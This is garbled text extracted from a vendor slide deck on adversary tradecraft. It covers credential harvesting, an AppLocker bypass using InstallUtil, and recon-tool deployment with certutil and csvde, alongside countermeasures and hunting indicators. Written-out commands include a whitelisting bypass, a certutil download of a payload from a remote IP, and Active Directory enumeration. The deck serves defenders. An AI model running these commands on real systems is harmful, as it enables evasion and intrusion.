LEARNING FROM HIGH-PROFILE BREACHES
AND STOPPING THE NEXT ONE
DAN LARSON –VP OF PRODUCT, CROWDSTRIKE
AND STOPPING THE NEXT ONE DAN LARSON VP OF PRODUCT, CROWDSTRIKE - - PowerPoint PPT Presentation
LEARNING FROM HIGH-PROFILE BREACHES AND STOPPING THE NEXT ONE DAN LARSON VP OF PRODUCT, CROWDSTRIKE CROWD-SOURCED CLOUD-BASED 150B CAPTURE INDICATORS OF Events/ day COMPROMISE 109 ENRICH Adversaries tracked 25,000 HUNT INDICATORS
LEARNING FROM HIGH-PROFILE BREACHES
DAN LARSON –VP OF PRODUCT, CROWDSTRIKE
CROWD-SOURCED CLOUD-BASED
INDICATORS OF COMPROMISE INDICATORS OF ATTACK ARTIFICIAL INTELLIGENCE & MACHINE LEARNING
CAPTURE
150B
Events/ day
ENRICH
109
Adversaries tracked
HUNT
25,000
Breaches prevented/ year
PROTECT
3.5 million
IOA decisions/sec
LAT E S T AD V E R S AR Y T R AD E C R AF T
C A T E G O R Y :
CREDENTIAL THEFT
D E L I V E R Y :
STRATEGIC WEB COMPROMISE USING SMB
VARIATIONS OF REMOTE SOURCE
Javascript + Dean Edwards Packer obfuscation Tiny image Hidden in JQuery related Javascript files
TECHNICAL BREAKDOWN
REAL WORLD EXAMPLES
TARGETED NUMEROUS SECTORS Chemical – Sept 201
7
Financial – Sept 201
7
Hospitality – Sept 201
7
Oil & Gas – April 201
7
Technology – April 201
7
Engineering – April 201
7
Education – April 201
7
MASSIVE BERSERK BEAR CREDENTIAL HARVESTING CAMPAIGN
Another variation used spear-phishing emails. Word Docs contain code that attempts to retrieve doc template from remote source over WebDAV
REAL WORLD EXAMPLES
REAL WORLD EXAMPLES
Webmail VPN Remote conferencing software POST HARVESTING ACTIVITY
COUNTERMEASURES
Authentication (2FA)
connectivity to remote servers
(length/ duration/ reuse)
authentication
known SMB C2s
C A T E G O R Y :
WHITELISTING BYPASS
D E L I V E R Y :
INSTALLUTIL
TECHNICAL BREAKDOWN
InstallUtil
directory – handy for bypassing whitelists
created C# code that can be used in combination to bypass Applocker restriction of PowerShell
TECHNICAL BREAKDOWN
1 . Use InstallUtil-PowerShell.cs and System.Management.Automation.dll to compile a special PowerShell executable / w csc.exe
csc.exe / reference: System.Management.Automation.dll / out:powershell.exe InstallUtil-PowerShell.cs
2. Execute PowerShell binary with InstallUtil
InstallUtil.exe / logfile= / LogToConsole=false / U powershell.exe
REAL WORLD EXAMPLES
7, January 201 8
/ LogToConsole=false / u "C:\ Windows\ Microsoft.NET\ Framework\ v4.0. 3031 9\ WPF\ wpf-etw.dat
reporting https:/ / www.pwc.co.uk/ cyber- security/ pdf/ cloud-hopper-annex-b- final.pdf
/ u C:\ Windows\ System32\ CatRoot\ {1 27D0A1 D- 4EF2-1 1 D1
inputFormat xml -outputFormat text
COUNTERMEASURES
In many environments InstallUtil is rarely used
and compare arguments against historical usage Weak hunting indicator: FileName=installutil.exe AND CommandLine=*LogToConsole= false / u*
C A T E G O R Y :
DEPLOYMENT OF RECON TOOLS
D E L I V E R Y :
CERTUTIL + EXPAND + CSVDE
TECHNICAL BREAKDOWN
CERTUTIL
program that is installed as part of Certificate Services
remote file (-urlcache flag) and decode base64 files (-decode flag)
EXPAND
program to decompress CAB files
CSVDE
program that is installed as part of AD DS and AD LDS Tools feature
environment
TECHNICAL BREAKDOWN
Using CSVDE to enumerate Active Directory to disk csvde.exe –f out.csv Here is a subset of the data returned. I couldn’t fit it all, over 370 fields!
REAL WORLD EXAMPLES
Seen in Aug and Nov 201 7
certutil.exe -decode KB[REDACTED].log KB[REDACTED].log expand KB[REDACTED].log csvde.exe
Chinese Adversary
Seen in Feb 201 8
certutil.exe -urlcache -split -f http:/ / xx.xx.xx.xx/ news/ n4.jpg C:\ Users\ [REDACTED]\ AppData\ Local\ Temp\ 8\ index.zip
COUNTERMEASURES
Certutil is rarely used with the aforementioned command line args
compare arguments against historical usage
CommandLine=*-urlcache –split –f*
CommandLine=*-decode*
CSVDE is not found on client version of Windows, can be blocked or monitored for hunting indicator on non Server systems
Type!=Server
d
SPEED IS EVERYTHING:
begin moving laterally to other systems in the network
THE 1-10-60 RULE
TIME TO DETECT
1MIN
TIME TO INVESTIGATE
1 0 MIN
TIME TO REMEDIATE & CONTAIN
60 MIN
THE 1-10-60 RULE
TIME TO DETECT
1MIN KEYS TO SUCCESS:
MACHINE LEARNING
THE 1-10-60 RULE
TIME TO INVESTIGATE
1 0 MIN KEYS TO SUCCESS :
THE 1-10-60 RULE
TIME TO REMEDIATE & CONTAIN
60 MIN KEYS TO SUCCESS :
MANAGEMENT
COMMUNICATION
TRY IT FOR YOURSELF:
crowdstrike.com/freetrial